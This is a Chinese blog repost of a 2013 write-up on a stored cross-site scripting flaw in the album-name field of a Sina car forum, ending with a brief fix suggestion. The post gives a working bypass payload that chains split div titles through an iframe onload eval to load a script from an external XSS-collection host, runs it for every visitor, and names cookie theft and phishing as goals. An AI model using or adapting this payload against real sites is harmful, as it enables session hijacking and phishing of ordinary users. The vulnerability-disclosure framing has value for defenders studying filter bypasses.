记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

新浪某分站存储型xss及修复

2013-10-21 16:20

xss存储型,但是新浪做了httponly了吧。但是做个钓鱼绝对不是问题。 黑名单的过滤,还是过滤的少了侥幸绕过。
问题站点: 新浪汽车汽车论坛 url:http://bbs.auto.sina.com.cn

问题页面是 论坛有个人中心,里面的相册,创建相册



这里简单测试下html标签,过滤了 <img> <script>标签


但是没有过滤 <a>标签 ,<IFRAME>标签,<div>标签等,可以说明新浪用的是黑名单,只是把危险的标签过滤了。


没完,这之后我就悲剧了,我不知道sina的cookie不能用好吧。

 

然后构造<iframe> 执行语句, 字节长度做了限制这里是数据库存储长度所决定的哈,做了个字节尺,


<if><if><if><if><if><if><if><if><if><if><if><if><if><if><if><if>

 

好吧 直接上我的绕过语句


<div id="X" title="(function()">
<div id="E" title="{var s=document.createElement('script');"></div>
<div id="Y" title="s.src='http://xss.tw/xxxx';"></div>
<div id="Z" title="document.body.appendChild(s)})()"></div>
<iframe onload=eval(X.title+E.title+Y.title+Z.title)></iframe>

这里说下利用场景

因为字节限制,所以需要构造xss执行语句,所以上面的执行语句每句话是一个相册名字,很壮观吧。

完事后



所有访问我的相册列表人就会执行xss ,同样的问题 相片描述也存在类似问题。

 

xss 来了







额 cookie不能用 ??z。。。。

 修复方案:

在过滤写标签吧,这里的输入应该用不到标签的,把页面搞乱也不好看哈。

知识来源: www.2cto.com/Article/201310/251490.html

阅读:69175 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“新浪某分站存储型xss及修复”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云